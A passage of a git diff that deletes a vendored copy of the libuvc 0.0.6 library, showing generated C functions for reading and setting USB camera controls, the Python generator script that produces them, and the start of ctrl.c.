-    UVC_PU_SHARPNESS_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the GAMMA control.
- * @param devh UVC device handle
- * @param[out] gamma TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_gamma(uvc_device_handle_t *devh, uint16_t* gamma, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_GAMMA_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *gamma = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the GAMMA control.
- * @param devh UVC device handle
- * @param gamma TODO
- */
-uvc_error_t uvc_set_gamma(uvc_device_handle_t *devh, uint16_t gamma) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(gamma, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_GAMMA_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the WHITE_BALANCE_TEMPERATURE control.
- * @param devh UVC device handle
- * @param[out] temperature TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_white_balance_temperature(uvc_device_handle_t *devh, uint16_t* temperature, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_WHITE_BALANCE_TEMPERATURE_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *temperature = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the WHITE_BALANCE_TEMPERATURE control.
- * @param devh UVC device handle
- * @param temperature TODO
- */
-uvc_error_t uvc_set_white_balance_temperature(uvc_device_handle_t *devh, uint16_t temperature) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(temperature, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_WHITE_BALANCE_TEMPERATURE_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the WHITE_BALANCE_TEMPERATURE_AUTO control.
- * @param devh UVC device handle
- * @param[out] temperature_auto TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_white_balance_temperature_auto(uvc_device_handle_t *devh, uint8_t* temperature_auto, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_WHITE_BALANCE_TEMPERATURE_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *temperature_auto = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the WHITE_BALANCE_TEMPERATURE_AUTO control.
- * @param devh UVC device handle
- * @param temperature_auto TODO
- */
-uvc_error_t uvc_set_white_balance_temperature_auto(uvc_device_handle_t *devh, uint8_t temperature_auto) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = temperature_auto;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_WHITE_BALANCE_TEMPERATURE_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the WHITE_BALANCE_COMPONENT control.
- * @param devh UVC device handle
- * @param[out] blue TODO
- * @param[out] red TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_white_balance_component(uvc_device_handle_t *devh, uint16_t* blue, uint16_t* red, enum uvc_req_code req_code) {
-  uint8_t data[4];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_WHITE_BALANCE_COMPONENT_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *blue = SW_TO_SHORT(data + 0);
-    *red = SW_TO_SHORT(data + 2);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the WHITE_BALANCE_COMPONENT control.
- * @param devh UVC device handle
- * @param blue TODO
- * @param red TODO
- */
-uvc_error_t uvc_set_white_balance_component(uvc_device_handle_t *devh, uint16_t blue, uint16_t red) {
-  uint8_t data[4];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(blue, data + 0);
-  SHORT_TO_SW(red, data + 2);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_WHITE_BALANCE_COMPONENT_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the WHITE_BALANCE_COMPONENT_AUTO control.
- * @param devh UVC device handle
- * @param[out] white_balance_component_auto TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_white_balance_component_auto(uvc_device_handle_t *devh, uint8_t* white_balance_component_auto, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_WHITE_BALANCE_COMPONENT_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *white_balance_component_auto = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the WHITE_BALANCE_COMPONENT_AUTO control.
- * @param devh UVC device handle
- * @param white_balance_component_auto TODO
- */
-uvc_error_t uvc_set_white_balance_component_auto(uvc_device_handle_t *devh, uint8_t white_balance_component_auto) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = white_balance_component_auto;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_WHITE_BALANCE_COMPONENT_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the DIGITAL_MULTIPLIER control.
- * @param devh UVC device handle
- * @param[out] multiplier_step TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_digital_multiplier(uvc_device_handle_t *devh, uint16_t* multiplier_step, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_DIGITAL_MULTIPLIER_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *multiplier_step = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the DIGITAL_MULTIPLIER control.
- * @param devh UVC device handle
- * @param multiplier_step TODO
- */
-uvc_error_t uvc_set_digital_multiplier(uvc_device_handle_t *devh, uint16_t multiplier_step) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(multiplier_step, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_DIGITAL_MULTIPLIER_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the DIGITAL_MULTIPLIER_LIMIT control.
- * @param devh UVC device handle
- * @param[out] multiplier_step TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_digital_multiplier_limit(uvc_device_handle_t *devh, uint16_t* multiplier_step, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_DIGITAL_MULTIPLIER_LIMIT_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *multiplier_step = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the DIGITAL_MULTIPLIER_LIMIT control.
- * @param devh UVC device handle
- * @param multiplier_step TODO
- */
-uvc_error_t uvc_set_digital_multiplier_limit(uvc_device_handle_t *devh, uint16_t multiplier_step) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(multiplier_step, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_DIGITAL_MULTIPLIER_LIMIT_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the ANALOG_VIDEO_STANDARD control.
- * @param devh UVC device handle
- * @param[out] video_standard TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_analog_video_standard(uvc_device_handle_t *devh, uint8_t* video_standard, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_ANALOG_VIDEO_STANDARD_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *video_standard = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the ANALOG_VIDEO_STANDARD control.
- * @param devh UVC device handle
- * @param video_standard TODO
- */
-uvc_error_t uvc_set_analog_video_standard(uvc_device_handle_t *devh, uint8_t video_standard) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = video_standard;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_ANALOG_VIDEO_STANDARD_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the ANALOG_LOCK_STATUS control.
- * @param devh UVC device handle
- * @param[out] status TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_analog_video_lock_status(uvc_device_handle_t *devh, uint8_t* status, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_ANALOG_LOCK_STATUS_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *status = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the ANALOG_LOCK_STATUS control.
- * @param devh UVC device handle
- * @param status TODO
- */
-uvc_error_t uvc_set_analog_video_lock_status(uvc_device_handle_t *devh, uint8_t status) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = status;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_ANALOG_LOCK_STATUS_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the INPUT_SELECT control.
- * @param devh UVC device handle
- * @param[out] selector TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_input_select(uvc_device_handle_t *devh, uint8_t* selector, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_SU_INPUT_SELECT_CONTROL << 8,
-    uvc_get_selector_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *selector = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the INPUT_SELECT control.
- * @param devh UVC device handle
- * @param selector TODO
- */
-uvc_error_t uvc_set_input_select(uvc_device_handle_t *devh, uint8_t selector) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = selector;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_SU_INPUT_SELECT_CONTROL << 8,
-    uvc_get_selector_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
diff --git a/thirdparty/libuvc-0.0.6/src/ctrl-gen.py b/thirdparty/libuvc-0.0.6/src/ctrl-gen.py
deleted file mode 100755
index d349a73..0000000
--- a/thirdparty/libuvc-0.0.6/src/ctrl-gen.py
+++ /dev/null
@@ -1,302 +0,0 @@
-#!/usr/bin/env python
-from __future__ import print_function
-from collections import OrderedDict
-import getopt
-import sys
-import yaml
-
-class quoted(str): pass
-
-def quoted_presenter(dumper, data):
-    return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='"')
-yaml.add_representer(quoted, quoted_presenter)
-
-class literal(str): pass
-
-def literal_presenter(dumper, data):
-    return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|')
-yaml.add_representer(literal, literal_presenter)
-
-def ordered_dict_presenter(dumper, data):
-    return dumper.represent_dict(data.items())
-yaml.add_representer(OrderedDict, ordered_dict_presenter)
-
-def dict_constructor(loader, node):
-    return OrderedDict(loader.construct_pairs(node))
-_mapping_tag = yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG
-yaml.add_constructor(_mapping_tag, dict_constructor)
-
-class IntField(object):
-    def __init__(self, name, position, length, signed):
-        self.name = name
-        self.position = position
-        self.length = length
-        self.signed = signed
-
-        if not self.length in [1, 2, 4]:
-            raise Exception("bad length " + str(self.length))
-
-        self.user_type = ('u' if not signed else '') + 'int' + str(length * 8) + '_t'
-
-    def getter_sig(self):
-        return "{0}* {1}".format(self.user_type, self.name)
-
-    def unpack(self):
-        if self.length == 1:
-            return "*{0} = data[{1}];".format(self.name, self.position)
-        elif self.length == 2:
-            return "*{0} = SW_TO_SHORT(data + {1});".format(self.name, self.position)
-        elif self.length == 4:
-            return "*{0} = DW_TO_INT(data + {1});".format(self.name, self.position)
-
-    def setter_sig(self):
-        return "{0} {1}".format(self.user_type, self.name)
-
-    def pack(self):
-        if self.length == 1:
-            return "data[{0}] = {1};".format(self.position, self.name)
-        elif self.length == 2:
-            return "SHORT_TO_SW({0}, data + {1});".format(self.name, self.position)
-        elif self.length == 4:
-            return "INT_TO_DW({0}, data + {1});".format(self.name, self.position)
-
-    def spec(self):
-        rep = [('position', self.position), ('length', self.length)]
-        if self.signed:
-            rep.append(('signed', True))
-        return rep
-
-    @staticmethod
-    def load(spec):
-        return IntField(spec['name'], spec['position'], spec['length'], spec['signed'] if signed in spec else False)
-
-def load_field(name, spec):
-    if spec['type'] == 'int':
-        return IntField(name, spec['position'], spec['length'], spec.get('signed', False))
-    else:
-        raise Exception("unknown field type '{0}'".format(spec['type']))
-
-GETTER_TEMPLATE = """/** @ingroup ctrl
- * {gen_doc}
- * @param devh UVC device handle
- * {args_doc}
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_{control_name}(uvc_device_handle_t *devh, {args_signature}, enum uvc_req_code req_code) {{
-  uint8_t data[{control_length}];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    {control_code} << 8,
-    {unit_fn} << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {{
-    {unpack}
-    return UVC_SUCCESS;
-  }} else {{
-    return ret;
-  }}
-}}
-"""
-
-SETTER_TEMPLATE = """/** @ingroup ctrl
- * {gen_doc}
- * @param devh UVC device handle
- * {args_doc}
- */
-uvc_error_t uvc_set_{control_name}(uvc_device_handle_t *devh, {args_signature}) {{
-  uint8_t data[{control_length}];
-  uvc_error_t ret;
-
-  {pack}
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    {control_code} << 8,
-    {unit_fn} << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}}
-"""
-
-def gen_decl(unit_name, unit, control_name, control):
-    fields = [(load_field(field_name, field_details), field_details['doc']) for field_name, field_details in control['fields'].items()] if 'fields' in control else []
-
-    get_args_signature = ', '.join([field.getter_sig() for (field, desc) in fields])
-    set_args_signature = ', '.join([field.setter_sig() for (field, desc) in fields])
-
-    return "uvc_error_t uvc_get_{function_name}(uvc_device_handle_t *devh, {args_signature}, enum uvc_req_code req_code);\n".format(**{
-        "function_name": control_name,
-        "args_signature": get_args_signature
-    }) + "uvc_error_t uvc_set_{function_name}(uvc_device_handle_t *devh, {args_signature});\n".format(**{
-        "function_name": control_name,
-        "args_signature": set_args_signature
-    })
-
-def gen_ctrl(unit_name, unit, control_name, control):
-    fields = [(load_field(field_name, field_details), field_details['doc']) for field_name, field_details in control['fields'].items()] if 'fields' in control else []
-
-    get_args_signature = ', '.join([field.getter_sig() for (field, desc) in fields])
-    set_args_signature = ', '.join([field.setter_sig() for (field, desc) in fields])
-    unpack = "\n    ".join([field.unpack() for (field, desc) in fields])
-    pack = "\n  ".join([field.pack() for (field, desc) in fields])
-
-    get_gen_doc_raw = None
-    set_gen_doc_raw = None
-
-    if 'doc' in control:
-        doc = control['doc']
-
-        if isinstance(doc, str):
-            get_gen_doc_raw = "\n * ".join(doc.splitlines())
-            set_gen_doc_raw = get_gen_doc_raw
-        else:
-            if 'get' in doc:
-                get_gen_doc_raw = "\n * ".join(doc['get'].splitlines())
-            if 'set' in doc:
-                set_gen_doc_raw = "\n * ".join(doc['set'].splitlines())
-
-    if get_gen_doc_raw is not None:
-        get_gen_doc = get_gen_doc_raw.format(gets_sets='Reads')
-    else:
-        get_gen_doc = '@brief Reads the ' + control['control'] + ' control.'
-
-    if set_gen_doc_raw is not None:
-        set_gen_doc = set_gen_doc_raw.format(gets_sets='Sets')
-    else:
-        set_gen_doc = '@brief Sets the ' + control['control'] + ' control.'
-
-    get_args_doc = "\n * ".join(["@param[out] {0} {1}".format(field.name, desc) for (field, desc) in fields])
-    set_args_doc = "\n * ".join(["@param {0} {1}".format(field.name, desc) for (field, desc) in fields])
-
-    control_code = 'UVC_' + unit['control_prefix'] + '_' + control['control'] + '_CONTROL'
-
-    unit_fn = "uvc_get_camera_terminal(devh)->bTerminalID" if (unit_name == "camera_terminal") else ("uvc_get_" + unit_name + "s(devh)->bUnitID")
-
-    return GETTER_TEMPLATE.format(
-        unit=unit,
-        unit_fn=unit_fn,
-        control_name=control_name,
-        control_code=control_code,
-        control_length=control['length'],
-        args_signature=get_args_signature,
-        args_doc=get_args_doc,
-        gen_doc=get_gen_doc,
-        unpack=unpack) + "\n\n" + SETTER_TEMPLATE.format(
-            unit=unit,
-            unit_fn=unit_fn,
-            control_name=control_name,
-            control_code=control_code,
-            control_length=control['length'],
-            args_signature=set_args_signature,
-            args_doc=set_args_doc,
-            gen_doc=set_gen_doc,
-            pack=pack
-        )
-
-def export_unit(unit):
-    def fmt_doc(doc):
-        def wrap_doc_entry(entry):
-            if "\n" in entry:
-                return literal(entry)
-            else:
-                return entry
-
-        if isinstance(doc, str):
-            return wrap_doc_entry(doc)
-        else:
-            return OrderedDict([(mode, wrap_doc_entry(text)) for mode, text in doc.items()])
-
-    def fmt_ctrl(control_name, control_details):
-        contents = OrderedDict()
-        contents['control'] = control_details['control']
-        contents['length'] = control_details['length']
-        contents['fields'] = control_details['fields']
-
-        if 'doc' in control_details:
-            contents['doc'] = fmt_doc(control_details['doc'])
-
-        return (control_name, contents)
-
-    unit_out = OrderedDict()
-    unit_out['type'] = unit['type']
-    if 'guid' in unit:
-        unit_out['guid'] = unit['guid']
-    if 'description' in unit:
-        unit_out['description'] = unit['description']
-    if 'control_prefix' in unit:
-        unit_out['control_prefix'] = unit['control_prefix']
-    unit_out['controls'] = OrderedDict([fmt_ctrl(ctrl_name, ctrl_details) for ctrl_name, ctrl_details in unit['controls'].items()])
-    return unit_out
-
-if __name__ == '__main__':
-    try:
-        opts, args = getopt.getopt(sys.argv[1:], "hi:", ["help", "input="])
-    except getopt.GetoptError as err:
-        print(str(err))
-        usage()
-        sys.exit(-1)
-
-    inputs = []
-
-    for opt, val in opts:
-        if opt in ('-h', '--help'):
-            usage()
-            sys.exit(0)
-        elif opt in ('-i', '--input'):
-            inputs.append(val)
-
-    mode = None
-    for arg in args:
-        if arg in ('def', 'decl', 'yaml'):
-            if mode is None:
-                mode = arg
-            else:
-                print("Can't specify more than one mode")
-                sys.exit(-1)
-        else:
-            print("Invalid mode '{0}'".format(arg))
-            sys.exit(-1)
-
-    def iterunits():
-        for input_file in inputs:
-            with open(input_file, "r") as fp:
-                units = yaml.load(fp)['units']
-                for unit_name, unit_details in units.iteritems():
-                    yield unit_name, unit_details
-
-    if mode == 'def':
-        print("""/* This is an AUTO-GENERATED file! Update it with the output of `ctrl-gen.py def`. */
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-static const int REQ_TYPE_SET = 0x21;
-static const int REQ_TYPE_GET = 0xa1;
-""")
-        fun = gen_ctrl
-    elif mode == 'decl':
-        fun = gen_decl
-    elif mode == 'yaml':
-        exported_units = OrderedDict()
-        for unit_name, unit_details in iterunits():
-            exported_units[unit_name] = export_unit(unit_details)
-
-        yaml.dump({'units': exported_units}, sys.stdout, default_flow_style=False)
-        sys.exit(0)
-
-    for unit_name, unit_details in iterunits():
-        for control_name, control_details in unit_details['controls'].iteritems():
-            code = fun(unit_name, unit_details, control_name, control_details)
-            print(code)
diff --git a/thirdparty/libuvc-0.0.6/src/ctrl.c b/thirdparty/libuvc-0.0.6/src/ctrl.c
deleted file mode 100644
index 3dffe79..0000000
--- a/thirdparty/libuvc-0.0.6/src/ctrl.c
+++ /dev/null
@@ -1,165 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-/**
- * @defgroup ctrl Video capture and processing controls
- * @brief Functions for manipulating device settings and stream parameters
- *
- * The `uvc_get_*` and `uvc_set_*` functions are used to read and write the settings associated
- * with the device's input, processing and output units.
- */
-
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-static const int REQ_TYPE_SET = 0x21;
-static const int REQ_TYPE_GET = 0xa1;
-
-/***** GENERIC CONTROLS *****/
-/**
- * @brief Get the length of a control on a terminal or unit.
- * 
- * @param devh UVC device handle
- * @param unit Unit or Terminal ID; obtain this from the uvc_extension_unit_t describing the extension unit
- * @param ctrl Vendor-specific control number to query
- * @return On success, the length of the control as reported by the device. Otherwise,
- *   a uvc_error_t error describing the error encountered.
- * @ingroup ctrl
- */
-int uvc_get_ctrl_len(uvc_device_handle_t *devh, uint8_t unit, uint8_t ctrl) {
-  unsigned char buf[2];
-
-  int ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, UVC_GET_LEN,
-    ctrl << 8,
-    unit << 8 | devh->info->ctrl_if.bInterfaceNumber,		// XXX saki
-    buf,
-    2,
-    0 /* timeout */);
-
-  if (ret < 0)
-    return ret;
-  else
-    return (unsigned short)SW_TO_SHORT(buf);
-}
-
-/**
- * @brief Perform a GET_* request from an extension unit.
- * 
- * @param devh UVC device handle
- * @param unit Unit ID; obtain this from the uvc_extension_unit_t describing the extension unit
- * @param ctrl Control number to query
- * @param data Data buffer to be filled by the device
- * @param len Size of data buffer
- * @param req_code GET_* request to execute
- * @return On success, the number of bytes actually transferred. Otherwise,
- *   a uvc_error_t error describing the error encountered.
- * @ingroup ctrl
- */
-int uvc_get_ctrl(uvc_device_handle_t *devh, uint8_t unit, uint8_t ctrl, void *data, int len, enum uvc_req_code req_code) {
-  return libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    ctrl << 8,
-    unit << 8 | devh->info->ctrl_if.bInterfaceNumber,		// XXX saki
-    data,
-    len,
-    0 /* timeout */);
-}
-
-/**
- * @brief Perform a SET_CUR request to a terminal or unit.
- * 
- * @param devh UVC device handle
- * @param unit Unit or Terminal ID
- * @param ctrl Control number to set
- * @param data Data buffer to be sent to the device
- * @param len Size of data buffer
- * @return On success, the number of bytes actually transferred. Otherwise,
- *   a uvc_error_t error describing the error encountered.
- * @ingroup ctrl
